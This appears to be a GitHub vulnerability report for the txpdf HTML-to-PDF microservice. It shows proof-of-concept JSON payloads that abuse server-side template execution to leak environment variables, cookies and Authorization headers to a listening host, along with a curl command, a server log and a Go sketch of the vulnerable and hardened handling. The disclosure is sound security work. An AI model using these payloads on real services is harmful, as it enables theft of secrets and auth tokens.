txn2 / txpdf

HTML to PDF microservice

Home Page: https://mk.imti.co/webpage-to-pdf-microservice/

Data exfil due to user controlled template

jessesomerville opened this issue

The /getPdf endpoint takes the body of the POST request and uses it as a text/template with the functions provided by sprig.TxtFuncMap(). This allows for the exfil of the server's environment variables and potentially auth tokens included in the request by middleware.

input.json:

{
  "options": {
    "print_media_type": true
  },
  "pages": [
    {
      "Location": "http://localhost:8000?{{env .UserAgent}}"
    }
  ]
}

curl -d '@input.json' -X POST http://localhost:8080/getPdf -A "PWD" --output test.pdf

Log from python -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
127.0.0.1 - - [04/Mar/2023 17:15:05] "GET /?/home/jsomerville/go/src/github.com/txn2/txpdf HTTP/1.1" 200 -

Or if this is running as a microservice you could steal the request headers that may have been added for S2S auth:

{
  "options": {
    "print_media_type": true
  },
  "pages": [
    {
      "Location": "http://localhost:8000?{{.Header.Get `Cookie`}};;{{.Header.Get `Authorization`}}"
    }
  ]
}
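
The pattern reported above next to a data-only alternative, as an added example that is not part of the original issue and is not txpdf's code. `renderVulnerable`, `parseHardened`, the `Job` type and the `DEMO_SECRET` variable are hypothetical names; `env` is mapped to `os.Getenv` as a stand-in for the sprig function of the same name, and the request and secret are constructed samples.

```go
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"net/http"
	"net/url"
	"os"
	"strings"
	"text/template"
)

// Job mirrors the "pages" array of the request body shown in the issue.
type Job struct{ Pages []struct{ Location string } `json:"pages"` }

// renderVulnerable executes the request body as a template against the
// request itself, so the sender can call env and read request headers.
func renderVulnerable(body string, r *http.Request) (string, error) {
	t, err := template.New("body").Funcs(template.FuncMap{"env": os.Getenv}).Parse(body)
	if err != nil {
		return "", err
	}
	var out bytes.Buffer
	err = t.Execute(&out, r)
	return out.String(), err
}

// parseHardened treats the body as JSON data only and rejects locations
// that are not http(s) URLs or that carry template delimiters.
func parseHardened(body string) (*Job, error) {
	var job Job
	if err := json.Unmarshal([]byte(body), &job); err != nil {
		return nil, err
	}
	for _, p := range job.Pages {
		u, err := url.Parse(p.Location)
		if err != nil || (u.Scheme != "http" && u.Scheme != "https") || strings.Contains(p.Location, "{{") {
			return nil, fmt.Errorf("rejected page location %q", p.Location)
		}
	}
	return &job, nil
}

func main() {
	os.Setenv("DEMO_SECRET", "constructed-value") // constructed sample secret
	r := &http.Request{Header: http.Header{"User-Agent": []string{"DEMO_SECRET"}}}
	body := `{"pages":[{"Location":"http://localhost:8000?{{env .UserAgent}}"}]}`
	fmt.Println(renderVulnerable(body, r)) // secret appears in the rendered URL
	fmt.Println(parseHardened(body))       // body is refused before any fetch
}
```

The delimiter check is a defence-in-depth signal for logging; the actual fix in this sketch is that the body is never passed to the template engine.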

added security section to README